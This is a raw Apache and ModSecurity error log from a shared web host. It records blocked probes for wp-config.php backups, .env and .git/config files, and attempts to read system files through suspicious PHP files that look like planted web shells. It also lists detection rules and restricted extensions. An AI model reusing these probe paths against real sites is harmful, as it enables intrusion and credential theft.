[Mon May 11 20:59:00.716429 2026] [security2:error] [pid 1511173:tid 1511187] [client 124.156.200.223:46494] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/chiens.php"] [unique_id "agIm9PjVc-A-CSptvm1yUQAAAEs"]
PHP Warning:  filesize(): stat failed for /proc/693/task/693/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/693/task/693/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/693/task/693/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/693/task/693/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/693/task/693/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/693/task/693/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 20:59:04.698491 2026] [security2:error] [pid 1502013:tid 1502046] [client 216.73.216.110:6680] ModSecurity: Warning. Matched phrase ".bash_logout" at ARGS:edit. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: .bash_logout found within ARGS:edit: .bash_logout"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/index.php"] [unique_id "agIm-JYn-x0CHsbEbP2umAAAAJQ"]
[Mon May 11 20:59:04.702647 2026] [security2:error] [pid 1502013:tid 1502046] [client 216.73.216.110:6680] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/index.php"] [unique_id "agIm-JYn-x0CHsbEbP2umAAAAJQ"]
[Mon May 11 20:59:04.796409 2026] [security2:error] [pid 1502013:tid 1502046] [client 216.73.216.110:6680] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIm-JYn-x0CHsbEbP2umAAAAJQ"]
[Mon May 11 20:59:05.887039 2026] [security2:error] [pid 1501831:tid 1501857] [client 20.220.233.65:27298] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "boxbaby.happy-baby-box.fr"] [uri "/wp-config.php.backup"] [unique_id "agIm-VNddpkriGUb6ZV4GwAAARg"]
[Mon May 11 20:59:05.887245 2026] [security2:error] [pid 1501831:tid 1501857] [client 20.220.233.65:27298] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "boxbaby.happy-baby-box.fr"] [uri "/wp-config.php.backup"] [unique_id "agIm-VNddpkriGUb6ZV4GwAAARg"]
[Mon May 11 20:59:05.887465 2026] [security2:error] [pid 1501831:tid 1501857] [client 20.220.233.65:27298] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "boxbaby.happy-baby-box.fr"] [uri "/403.shtml"] [unique_id "agIm-VNddpkriGUb6ZV4GwAAARg"]
[Mon May 11 20:59:10.242587 2026] [security2:error] [pid 1501831:tid 1501857] [client 20.220.233.65:27298] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /backup.wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "boxbaby.happy-baby-box.fr"] [uri "/backup.wp-config.php"] [unique_id "agIm_lNddpkriGUb6ZV4OwAAARg"]
[Mon May 11 20:59:10.242733 2026] [security2:error] [pid 1501831:tid 1501857] [client 20.220.233.65:27298] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "boxbaby.happy-baby-box.fr"] [uri "/backup.wp-config.php"] [unique_id "agIm_lNddpkriGUb6ZV4OwAAARg"]
[Mon May 11 20:59:10.242903 2026] [security2:error] [pid 1501831:tid 1501857] [client 20.220.233.65:27298] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "boxbaby.happy-baby-box.fr"] [uri "/403.shtml"] [unique_id "agIm_lNddpkriGUb6ZV4OwAAARg"]
[Mon May 11 20:59:14.280327 2026] [security2:error] [pid 1511173:tid 1511193] [client 43.130.102.223:39154] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "agInAvjVc-A-CSptvm1yVwAAAFE"]
[Mon May 11 20:59:21.881815 2026] [security2:error] [pid 1501831:tid 1501857] [client 20.220.233.65:27298] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /new-wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "boxbaby.happy-baby-box.fr"] [uri "/new-wp-config.php"] [unique_id "agInCVNddpkriGUb6ZV4bAAAARg"]
[Mon May 11 20:59:21.881968 2026] [security2:error] [pid 1501831:tid 1501857] [client 20.220.233.65:27298] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "boxbaby.happy-baby-box.fr"] [uri "/new-wp-config.php"] [unique_id "agInCVNddpkriGUb6ZV4bAAAARg"]
[Mon May 11 20:59:21.882149 2026] [security2:error] [pid 1501831:tid 1501857] [client 20.220.233.65:27298] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "boxbaby.happy-baby-box.fr"] [uri "/403.shtml"] [unique_id "agInCVNddpkriGUb6ZV4bAAAARg"]
[Mon May 11 20:59:27.579219 2026] [security2:error] [pid 1501883:tid 1501894] [client 43.128.87.4:48138] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/category/anniversaire/"] [unique_id "agInDzP5Q_-MBliRCAxpHAAAAAk"]
[Mon May 11 20:59:34.284346 2026] [security2:error] [pid 1501831:tid 1501852] [client 216.73.216.110:49490] ModSecurity: Warning. Matched phrase "etc/logrotate.conf" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/logrotate.conf found within ARGS:filesrc: /etc/logrotate.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agInFlNddpkriGUb6ZV4iQAAARM"]
[Mon May 11 20:59:34.285295 2026] [security2:error] [pid 1501831:tid 1501852] [client 216.73.216.110:49490] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agInFlNddpkriGUb6ZV4iQAAARM"]
[Mon May 11 20:59:34.376929 2026] [security2:error] [pid 1501831:tid 1501852] [client 216.73.216.110:49490] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agInFlNddpkriGUb6ZV4iQAAARM"]
[Mon May 11 20:59:39.769742 2026] [security2:error] [pid 1501831:tid 1501838] [client 43.156.232.134:48150] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "piregwan-genesis.com"] [uri "/"] [unique_id "agInG1NddpkriGUb6ZV4iwAAAQU"], referer: http://piregwan-genesis.com
[Mon May 11 20:59:42.111142 2026] [security2:error] [pid 1516058:tid 1516090] [client 43.157.181.189:58800] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/simple-ronde/"] [unique_id "agInHiMeXtzav-mi9SyzYgAAAMA"]
[Mon May 11 20:59:55.929506 2026] [security2:error] [pid 1511173:tid 1511183] [client 43.130.26.3:39442] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/accommodation/mobil-home-hawai/"] [unique_id "agInK_jVc-A-CSptvm1y8wAAAEc"]
[Mon May 11 21:00:10.164131 2026] [security2:error] [pid 1501883:tid 1501886] [client 43.133.139.6:47356] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.apoe.fr"] [uri "/"] [unique_id "agInOjP5Q_-MBliRCAxpcQAAAAE"]
[Mon May 11 21:00:16.920236 2026] [security2:error] [pid 1501883:tid 1501896] [client 172.94.9.253:48130] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "classist.fr"] [uri "/.git/config"] [unique_id "agInQDP5Q_-MBliRCAxpdQAAAAs"]
[Mon May 11 21:00:16.920452 2026] [security2:error] [pid 1501883:tid 1501896] [client 172.94.9.253:48130] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "classist.fr"] [uri "/.git/config"] [unique_id "agInQDP5Q_-MBliRCAxpdQAAAAs"]
[Mon May 11 21:00:16.920809 2026] [security2:error] [pid 1501883:tid 1501896] [client 172.94.9.253:48130] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "classist.fr"] [uri "/.git/config"] [unique_id "agInQDP5Q_-MBliRCAxpdQAAAAs"]
[Mon May 11 21:00:53.811805 2026] [security2:error] [pid 1502013:tid 1502059] [client 77.83.39.197:45208] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env"] [unique_id "agInZJYn-x0CHsbEbP2u9wAAAIk"]
[Mon May 11 21:00:53.812136 2026] [security2:error] [pid 1502013:tid 1502059] [client 77.83.39.197:45208] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env"] [unique_id "agInZJYn-x0CHsbEbP2u9wAAAIk"]
[Mon May 11 21:00:53.813683 2026] [security2:error] [pid 1502013:tid 1502059] [client 77.83.39.197:45208] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agInZJYn-x0CHsbEbP2u9wAAAIk"]
[Mon May 11 21:01:26.819381 2026] [:error] [pid 1501831:tid 1501845] [client 137.184.167.85:50472] File does not exist: /home/apoefr/public_html/xmlrpc.php
[Mon May 11 21:01:35.727907 2026] [ssl:error] [pid 1501831:tid 1501852] (EAI 2)Name or service not known: [client 45.77.142.150:50518] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:01:35.727947 2026] [ssl:error] [pid 1501831:tid 1501852] AH01941: stapling_renew_response: responder error
[Mon May 11 21:01:35.939807 2026] [ssl:error] [pid 1516058:tid 1516096] (EAI 2)Name or service not known: [client 18.157.153.160:44267] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 21:01:35.940093 2026] [ssl:error] [pid 1516058:tid 1516096] AH01941: stapling_renew_response: responder error
[Mon May 11 21:01:36.014558 2026] [ssl:error] [pid 1501883:tid 1501893] (EAI 2)Name or service not known: [client 18.193.15.23:1400] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 21:01:36.014764 2026] [ssl:error] [pid 1501883:tid 1501893] AH01941: stapling_renew_response: responder error
[Mon May 11 21:01:36.199467 2026] [ssl:error] [pid 1501831:tid 1501838] (EAI 2)Name or service not known: [client 18.159.231.78:20384] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 21:01:36.199574 2026] [ssl:error] [pid 1501831:tid 1501838] AH01941: stapling_renew_response: responder error
[Mon May 11 21:01:36.247696 2026] [ssl:error] [pid 1501883:tid 1501908] (EAI 2)Name or service not known: [client 18.159.231.78:15192] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 21:01:36.247726 2026] [ssl:error] [pid 1501883:tid 1501908] AH01941: stapling_renew_response: responder error
[Mon May 11 21:01:41.240893 2026] [ssl:error] [pid 1511173:tid 1511190] (EAI 2)Name or service not known: [client 45.11.234.99:41079] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:01:41.240924 2026] [ssl:error] [pid 1511173:tid 1511190] AH01941: stapling_renew_response: responder error
[Mon May 11 21:01:45.392501 2026] [:error] [pid 1501831:tid 1501842] [client 57.129.135.175:55768] File does not exist: /home/ofcrysta/public_html/exposition_chien.php
[Mon May 11 21:01:45.941358 2026] [:error] [pid 1502013:tid 1502049] [client 141.94.76.134:43934] File does not exist: /home/ofcrysta/public_html/exposition_chien.php
[Mon May 11 21:01:46.235053 2026] [ssl:error] [pid 1516058:tid 1516110] (EAI 2)Name or service not known: [client 142.93.170.27:51848] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:01:46.235093 2026] [ssl:error] [pid 1516058:tid 1516110] AH01941: stapling_renew_response: responder error
[Mon May 11 21:01:48.528901 2026] [ssl:error] [pid 1516058:tid 1516091] (EAI 2)Name or service not known: [client 193.228.59.11:33523] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:01:48.528949 2026] [ssl:error] [pid 1516058:tid 1516091] AH01941: stapling_renew_response: responder error
[Mon May 11 21:01:49.718906 2026] [ssl:error] [pid 1501831:tid 1501836] (EAI 2)Name or service not known: [client 31.204.9.175:34203] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:01:49.718932 2026] [ssl:error] [pid 1501831:tid 1501836] AH01941: stapling_renew_response: responder error
[Mon May 11 21:01:50.950791 2026] [ssl:error] [pid 1501831:tid 1501850] (EAI 2)Name or service not known: [client 181.115.60.49:11745] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:01:50.950825 2026] [ssl:error] [pid 1501831:tid 1501850] AH01941: stapling_renew_response: responder error
[Mon May 11 21:01:55.601210 2026] [security2:error] [pid 1501831:tid 1501847] [client 216.73.216.110:56004] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".db"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/learning/file/flash/1425550673/assets/Thumbs.db"] [unique_id "agIno1NddpkriGUb6ZV5IAAAAQ4"]
[Mon May 11 21:01:55.601618 2026] [security2:error] [pid 1501831:tid 1501847] [client 216.73.216.110:56004] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/learning/file/flash/1425550673/assets/Thumbs.db"] [unique_id "agIno1NddpkriGUb6ZV5IAAAAQ4"]
[Mon May 11 21:01:55.681642 2026] [ssl:error] [pid 1501831:tid 1501851] (EAI 2)Name or service not known: [client 80.240.16.114:35174] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 21:01:55.681668 2026] [ssl:error] [pid 1501831:tid 1501851] AH01941: stapling_renew_response: responder error
[Mon May 11 21:01:55.765072 2026] [security2:error] [pid 1501831:tid 1501847] [client 216.73.216.110:56004] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIno1NddpkriGUb6ZV5IAAAAQ4"]
